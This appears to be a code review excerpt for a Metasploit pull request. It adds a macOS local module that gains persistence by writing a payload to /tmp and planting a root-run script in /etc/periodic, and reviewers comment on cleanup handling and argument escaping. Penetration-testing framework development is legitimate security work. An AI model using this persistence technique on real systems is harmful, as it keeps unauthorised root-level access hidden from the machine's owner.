modules/exploits/osx/local/periodic_script_persistence.rb

```diff
@@ -0,0 +1,122 @@
+          This payload requires root privileges to run.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => 'gardnerapp',
+        'References' => [
+          [
+            'URL', 'https://taomm.org/vol1/pdfs/CH%202%20Persistence.pdf',
+            'URL', 'https://superuser.com/questions/391204/what-is-the-difference-between-periodic-and-cron-on-os-x/'
+          ]
+        ],
+        'DisclosureDate' => '2012-04-01',
+        'Privileged' => true,
+        'Targets' => [
+          [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
+          [ 'Mac OS X x86 (Native Payload for 10.14 and earlier)', { 'Arch' => ARCH_X86, 'Platform' => [ 'osx' ] } ],
+          ['Mac OS X Apple Sillicon', { 'Arch' => ARCH_AARCH64, 'Platform' => ['osx'] }],
+          [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
+          [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
+        ],
+        'DefaultTarget' => 0,
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Platform' => [ 'osx', 'python', 'unix' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptEnum.new('PERIODIC_DIR', [true, 'Periodic Directory to write script eg. /etc/periodic/daily', 'daily', %w[daily weekly monthly]]),
+      OptString.new('SCRIPT_NAME', [false, 'Name of script ', Rex::Text.rand_text_alphanumeric(rand(6..13))]),
+      OptString.new('PAYLOAD_DIR', [true, 'Directory to write payload to', '/tmp/']),
+      OptString.new('PAYLOAD_FILENAME', [true, 'Name of the payload file.', Rex::Text.rand_text_alphanumeric(rand(6..13))])
+    ])
+  end
+
+  def check
+    if writable? '/etc/periodic'
+      print_good '/etc/periodic is writable'
+    else
+      return CheckCode::Safe 'Unable to write to /etc/periodic'
+    end
+
+    return CheckCode::Vulnerable
+  end
+
+  def write_payload(payload_bin)
+
+    payload_dir = datastore['PAYLOAD_DIR']
+    fail_with(Failure::BadConfig, "The #{payload_dir} is not writable.") unless writable? payload_dir
+
+    payload_dir += '/' unless payload_dir.ends_with? '/'
+
+    payload_file = payload_dir + datastore['PAYLOAD_FILENAME']
+
+    if write_file(payload_file, payload_bin)
+      print_good "Writing payload to #{payload_file} suceeded"
+      cmd_exec("chmod +x #{payload_file}")
+    else
+      fail_with(Failure::UnexpectedReply, "Unable to write payload to #{script}")
+    end
+
+    # add payload to cleanup
+    @cleanup << "rm #{payload_file} "
+    payload_file
+  end
+
+  def write_periodic_script(payload_file)
+
+    periodic_dir = "/etc/periodic/#{datastore['PERIODIC_DIR']}/"
+
+    script = periodic_dir + datastore['SCRIPT_NAME']
+
+    @cleanup << "#{script}"
```

Comment:
I believe this is supposed to be like `@clean_up_rc`, but that's only included when `include Msf::Exploit::Local::Persistence` is included. You can't include it yet because its part of the persistence overhaul. You may as well go ahead and change the variable name now (you also need a `\n`), and then just hold for the rebase.

Reply:
This is also going to have issues if `script` contains spaces. The string should be escaped using [`.escape_arg`.](https://github.com/rapid7/metasploit-framework/blob/5bb99d120f96362cf58bac222870d0dd2711d404/lib/msf/base/sessions/command_shell_unix.rb#L37)